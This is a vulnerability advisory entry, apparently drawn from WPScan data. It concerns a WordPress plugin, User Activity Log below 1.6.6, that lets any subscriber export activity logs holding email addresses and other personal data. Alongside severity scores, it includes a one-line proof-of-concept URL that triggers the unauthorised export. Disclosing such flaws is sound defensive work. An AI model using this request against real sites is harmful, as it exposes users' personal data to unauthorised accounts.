Lucene search

K
wpvulndbDaniel RufWPVDB-ID:DB3E4336-117C-47F2-9B43-2CA115525297
HistoryAug 09, 2023 - 12:00 a.m.

User Activity Log < 1.6.6 - Subscriber+ Log Export

2023-08-0900:00:00
Daniel Ruf
wpscan.com
7
plugin
data breach
authorization
subscriber
pii
url
security vulnerability

4.5 Medium

AI Score

Confidence

High

0.0004 Low

EPSS

Percentile

14.0%

Description The plugin lacks proper authorisation when exporting its activity logs, allowing any authenticated users, such as subscriber to perform such action and retrieve PII such as email addresses.

PoC

As a subscriber, open the following URL https://example.com/wp-admin/admin-post.php?page=user_action_log&amp;export;=user_logs&amp;logformat;=csv&amp;userrole;&amp;dateshow;&amp;username;&amp;type;&amp;showip;&amp;txtsearch;&amp;export-nonce;=aaa

CPENameOperatorVersion
eq1.6.6

4.5 Medium

AI Score

Confidence

High

0.0004 Low

EPSS

Percentile

14.0%

Related for WPVDB-ID:DB3E4336-117C-47F2-9B43-2CA115525297